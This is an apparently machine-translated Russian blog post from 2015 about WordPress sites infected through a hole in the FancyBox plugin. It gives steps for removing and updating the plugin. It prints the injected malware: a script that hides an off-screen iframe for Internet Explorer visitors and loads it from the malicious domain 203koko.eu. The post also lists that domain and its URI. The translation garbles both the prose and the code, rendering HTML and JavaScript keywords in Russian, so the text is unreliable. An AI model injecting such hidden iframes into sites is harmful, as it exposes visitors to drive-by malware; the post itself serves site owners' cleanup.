[Malware Iframe 203koko] Malware Зараженный WordPress сайты

Ранее на этой неделе ряд сайтов и блогов WordPressПолучили предупреждения вредоносные инфекции через Google Webmasters.

Проблема, к которой Google Webmasters упоминается является наличие треска / скрипт вредоносные программы iframe исходные веб-сайтов.

<Script> если (navigator.userAgent.match (/ MSIE / я)) {document.write ( «<DIV стиль = "позицию: абсолютная; слева: -2000px; ширина: 2000px"> <IFRAME SRC =«HTTP: / /203koko.eu/hjnfh/ipframe2.php "ширина =" 20 "высота =" 30 «> </ IFRAME> </ DIV>«); } </ SCRIPT>

Кажется, что это уязвимость a плагинAcquisFancyBox для WordPress который до вчерашнего дня (05.02.2015) никогда не обновляются в течение длительного времени.
Решая эту проблему и лечения вирусов сайтов с этим вредоносным ПО, относительно просто.
1. Отключить plugn сайт FancyBox.
2. Удалите все плагины FancyBox с сервера (через FTP)
3. Установите новую версию плагина (FancyBox 3.0.4)

FancyBox для WordPress 3.0.4

- Переименован параметр сталкивается с этой проблемой безопасности, отмеченных в 3.0.3. Это не должно остановить вредоносный код появляться на сайтах, где плагин обновляется без удаления вредоносного кода.

FancyBox для WordPress 3.0.3

-Исправлена ​​проблема безопасности.

Вредоносные программы информация:

ТИП: Iframe перенаправление
TARGET: FancyBox WordPress
MALWARE домене: 203koko.eu
ВРЕДОНОСНЫЕ URI: http://203koko.eu/hjnfh/ipframe2.php
RAW вредоносный код: <IFRAME SRC = "http://203koko.eu/hjnfh/ipframe2.php" ширина = "20" высота = "30"> </ IFRAME>
MALWARE скрипт: <SCRIPT>, если ((/ / я) navigator.userAgent.match MSIE) {document.write ('<стиль = "позицию: абсолютная; слева: -2000px; ширина: 2000px" DIV>

Удаление вредоносных программ с вашего сайта WordPress.

[Malware Iframe 203koko] Malware Зараженный WordPress сайты

Об авторе

Stealth LP

Основатель и главный редактор Настройки StealthВ день 2006.
Опыт в операционных системах Linux (в частности, CentOS), Mac OS X, Windows XP> Окна 10 и WordPress (CMS).

Оставить комментарий